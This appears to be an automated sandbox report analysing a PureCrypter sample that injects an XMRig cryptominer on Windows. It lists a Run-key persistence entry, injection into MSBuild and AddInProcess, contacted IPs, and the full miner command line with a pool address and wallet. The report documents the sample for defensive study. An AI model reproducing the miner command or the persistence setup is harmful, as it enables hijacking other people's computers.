Analysis Overview
SHA256
14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb
Threat Level: Known bad
The file tmp was found to be: Known bad.
Malicious Activity Summary
Detect PureCrypter injector
xmrig
PureCrypter
XMRig Miner payload
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: LoadsDriver
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-07 06:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-07 06:43
Reported
2023-02-07 06:46
Platform
win7-20220901-en
Max time kernel
45s
Max time network
49s
Command Line
Signatures
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\cloudapp = "\"C:\\Users\\Admin\\AppData\\Local\\WinSCP\\cloudapp.exe\"" | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Network
| Country | Destination | Domain | Proto |
| US | 163.123.142.210:80 | 163.123.142.210 | tcp |
Files
memory/2024-54-0x000000013FF40000-0x000000013FF6E000-memory.dmp
memory/2024-55-0x000000001FAB0000-0x000000001FD9A000-memory.dmp
memory/1668-56-0x0000000000000000-mapping.dmp
memory/1668-57-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp
memory/2024-58-0x000000001AC37000-0x000000001AC56000-memory.dmp
memory/1668-59-0x000007FEEC610000-0x000007FEED033000-memory.dmp
memory/1668-60-0x000007FEEBAB0000-0x000007FEEC60D000-memory.dmp
memory/1668-61-0x0000000001F94000-0x0000000001F97000-memory.dmp
memory/1668-62-0x0000000001F9B000-0x0000000001FBA000-memory.dmp
memory/1668-63-0x0000000001F9B000-0x0000000001FBA000-memory.dmp
memory/2024-64-0x000000001C310000-0x000000001C3CC000-memory.dmp
memory/2024-65-0x000000001AC37000-0x000000001AC56000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-07 06:43
Reported
2023-02-07 06:46
Platform
win10v2004-20220812-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cloudapp = "\"C:\\Users\\Admin\\AppData\\Local\\WinSCP\\cloudapp.exe\"" | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2220 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe |
| PID 1360 set thread context of 4132 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.17.0.19:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Network
| Country | Destination | Domain | Proto |
| US | 163.123.142.210:80 | 163.123.142.210 | tcp |
| NL | 52.178.17.3:443 | tcp | |
| IT | 179.43.155.202:9090 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| IN | 20.207.73.82:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.17.0.19:8080 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 178.79.208.1:80 | tcp |
Files
memory/2220-132-0x0000019F34120000-0x0000019F3414E000-memory.dmp
memory/2220-133-0x00007FFE4F0A0000-0x00007FFE4FB61000-memory.dmp
memory/2220-134-0x0000019F36100000-0x0000019F36122000-memory.dmp
memory/4336-135-0x0000000000000000-mapping.dmp
memory/4336-136-0x00007FFE4F0A0000-0x00007FFE4FB61000-memory.dmp
memory/2220-137-0x00007FFE4F0A0000-0x00007FFE4FB61000-memory.dmp
memory/4336-138-0x00007FFE4F0A0000-0x00007FFE4FB61000-memory.dmp
memory/4336-139-0x00007FFE4F0A0000-0x00007FFE4FB61000-memory.dmp
memory/1360-140-0x0000000000400000-0x000000000048C000-memory.dmp
memory/1360-141-0x0000000000400000-mapping.dmp
memory/2220-142-0x00007FFE4F0A0000-0x00007FFE4FB61000-memory.dmp
memory/1360-143-0x00007FFE4F0A0000-0x00007FFE4FB61000-memory.dmp
memory/1360-144-0x00007FFE4F0A0000-0x00007FFE4FB61000-memory.dmp
memory/4132-146-0x0000000140344454-mapping.dmp
memory/4132-145-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/4132-147-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/4132-148-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/4132-149-0x000001D85D190000-0x000001D85D1B0000-memory.dmp
memory/4132-150-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/4132-151-0x000001D85D2F0000-0x000001D85D330000-memory.dmp
memory/4132-152-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/4132-153-0x000001D85D330000-0x000001D85D350000-memory.dmp
memory/4132-154-0x000001D85D330000-0x000001D85D350000-memory.dmp